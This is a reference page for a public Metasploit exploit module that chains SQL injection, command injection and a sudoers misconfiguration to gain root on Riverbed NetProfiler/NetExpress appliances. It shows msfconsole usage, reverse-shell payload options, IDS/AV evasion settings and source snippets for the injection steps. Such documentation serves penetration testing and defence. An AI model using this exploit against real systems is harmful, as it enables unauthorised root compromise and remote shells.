Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/riverbed_netprofiler_netexpress_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution
Module: exploit/linux/http/riverbed_netprofiler_netexpress_exec
Source code: modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
Disclosure date: 2016-06-27
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x64
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form can be exploited to add a malicious user into the application's database. An attacker can then exploit a command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure configuration of the sudoers file can be abused to escalate privileges to root.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/linux/http/riverbed_netprofiler_netexpress_exec
msf exploit(riverbed_netprofiler_netexpress_exec) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/http/riverbed_netprofiler_netexpress_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/riverbed_netprofiler_netexpress_exec

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/riverbed_netprofiler_netexpress_exec) > show info

       Name: Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution
     Module: exploit/linux/http/riverbed_netprofiler_netexpress_exec
   Platform: Linux
       Arch: x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-06-27

Provided by:
  Francesco Oddo <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7

Check supported:
  Yes

Basic options:
  Name               Current Setting  Required  Description
  ----               ---------------  --------  -----------
  HTTPDELAY          10               yes       Time that the HTTP Server will wait for the payload request
  Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RIVERBED_PASSWORD  riverbed         yes       Web interface user password
  RIVERBED_USER      user             yes       Web interface user account to add
  RPORT              443              yes       The target port (TCP)
  SRVHOST            0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT            8080             yes       The local port to listen on.
  SSL                true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI          /                yes       The target URI
  URIPATH                             no        The URI to use for this exploit (default is random)
  VHOST                               no        HTTP server virtual host

Payload information:

Description:
  This module exploits three separate vulnerabilities found in the 
  Riverbed SteelCentral NetProfiler/NetExpress virtual appliances to 
  obtain remote command execution as the root user. A SQL injection in 
  the login form can be exploited to add a malicious user into the 
  application's database. An attacker can then exploit a command 
  injection vulnerability in the web interface to obtain arbitrary 
  code execution. Finally, an insecure configuration of the sudoers 
  file can be abused to escalate privileges to root.

References:
  http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf

Module Options


This is a complete list of options available in the linux/http/riverbed_netprofiler_netexpress_exec exploit:

msf6 exploit(linux/http/riverbed_netprofiler_netexpress_exec) > show options

Module options (exploit/linux/http/riverbed_netprofiler_netexpress_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   HTTPDELAY          10               yes       Time that the HTTP Server will wait for the payload request
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RIVERBED_PASSWORD  riverbed         yes       Web interface user password
   RIVERBED_USER      user             yes       Web interface user account to add
   RPORT              443              yes       The target port (TCP)
   SRVHOST            0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT            8080             yes       The local port to listen on.
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI          /                yes       The target URI
   URIPATH                             no        The URI to use for this exploit (default is random)
   VHOST                               no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7

Advanced Options


Here is a complete list of advanced options supported by the linux/http/riverbed_netprofiler_netexpress_exec exploit:

msf6 exploit(linux/http/riverbed_netprofiler_netexpress_exec) > show advanced

Module advanced options (exploit/linux/http/riverbed_netprofiler_netexpress_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/riverbed_netprofiler_netexpress_exec module can exploit:

msf6 exploit(linux/http/riverbed_netprofiler_netexpress_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/riverbed_netprofiler_netexpress_exec exploit:

msf6 exploit(linux/http/riverbed_netprofiler_netexpress_exec) > show payloads

Compatible Payloads
===================

   #   Name                                          Disclosure Date  Rank    Check  Description
   -   ----                                          ---------------  ----    -----  -----------
   0   payload/generic/custom                                         normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                 normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                              normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/linux/x64/exec                                         normal  No     Linux Execute Command
   4   payload/linux/x64/meterpreter/bind_tcp                         normal  No     Linux Mettle x64, Bind TCP Stager
   5   payload/linux/x64/meterpreter/reverse_tcp                      normal  No     Linux Mettle x64, Reverse TCP Stager
   6   payload/linux/x64/meterpreter_reverse_http                     normal  No     Linux Meterpreter, Reverse HTTP Inline
   7   payload/linux/x64/meterpreter_reverse_https                    normal  No     Linux Meterpreter, Reverse HTTPS Inline
   8   payload/linux/x64/meterpreter_reverse_tcp                      normal  No     Linux Meterpreter, Reverse TCP Inline
   9   payload/linux/x64/shell/bind_tcp                               normal  No     Linux Command Shell, Bind TCP Stager
   10  payload/linux/x64/shell/reverse_tcp                            normal  No     Linux Command Shell, Reverse TCP Stager
   11  payload/linux/x64/shell_bind_ipv6_tcp                          normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   12  payload/linux/x64/shell_bind_tcp                               normal  No     Linux Command Shell, Bind TCP Inline
   13  payload/linux/x64/shell_bind_tcp_random_port                   normal  No     Linux Command Shell, Bind TCP Random Port Inline
   14  payload/linux/x64/shell_reverse_ipv6_tcp                       normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   15  payload/linux/x64/shell_reverse_tcp                            normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/riverbed_netprofiler_netexpress_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/riverbed_netprofiler_netexpress_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Please select a valid Linux payload


Here is a relevant code snippet related to the "Please select a valid Linux payload" error message:

87:	    @elf_sent = false
88:	    # Generate payload
89:	    @pl = generate_payload_exe
90:	
91:	    if @pl.nil?
92:	      fail_with(Failure::BadConfig, 'Please select a valid Linux payload')
93:	    end
94:	
95:	    # Start the server and use primer to trigger fetching and running of the payload
96:	    begin
97:	      Timeout.timeout(datastore['HTTPDELAY']) { super }

Unable to get login nonce.


Here is a relevant code snippet related to the "Unable to get login nonce." error message:

111:	    if res && res.body && res.body.include?('nonce_')
112:	       html = res.get_html_document
113:	       nonce_field = html.at('input[@name="nonce"]')
114:	       nonce = nonce_field.attributes["value"]
115:	    else
116:	       fail_with(Failure::Unknown, 'Unable to get login nonce.')
117:	    end
118:	
119:	    # needed as login nonce is bounded to preauth SESSID cookie
120:	    sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
121:	

Invalid credentials. Creating malicious user through login SQLi


Here is a relevant code snippet related to the "Invalid credentials. Creating malicious user through login SQLi" error message:

140:	      'data'     => post_data
141:	     })
142:	
143:	    # Exploit login SQLi if credentials are not valid.
144:	    if res && res.body && res.body.include?('<form name="login"')
145:	       print_status("Invalid credentials. Creating malicious user through login SQLi")
146:	
147:	       create_user
148:	       nonce, sessid_cookie_preauth = get_nonce
149:	       post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
150:	

Unable to add user to database


Here is a relevant code snippet related to the "Unable to add user to database" error message:

199:	     })
200:	
201:	     if res && res.body && res.body.include?('session_id')
202:	       print_good("User account successfully created, login credentials: '#{username}':'#{password}'")
203:	     else
204:	       fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
205:	     end
206:	
207:	  end
208:	
209:	  def generate_sqli_payload(input)

Could not inject command, may not be vulnerable


Here is a relevant code snippet related to the "Could not inject command, may not be vulnerable" error message:

231:	      'encode_params' => false,
232:	      'data'     => post_data
233:	     })
234:	
235:	    unless res && res.body.include?('uid=')
236:	      fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
237:	    end
238:	
239:	  end
240:	
241:	  def cmd_inject(cmd)

Finished primer hook, raising Timeout::Error manually


Here is a relevant code snippet related to the "Finished primer hook, raising Timeout::Error manually" error message:

267:	    cmd_inject(privesc_exec_cmd)
268:	
269:	    register_file_for_cleanup("/tmp/#{root_ssh_key_private}")
270:	    register_file_for_cleanup("/tmp/#{binary_payload}")
271:	
272:	    vprint_status('Finished primer hook, raising Timeout::Error manually')
273:	    raise(Timeout::Error)
274:	  end
275:	
276:	  #Handle incoming requests from the server
277:	  def on_request_uri(cli, request)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Francesco Oddo <francesco.oddo[at]security-assessment.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.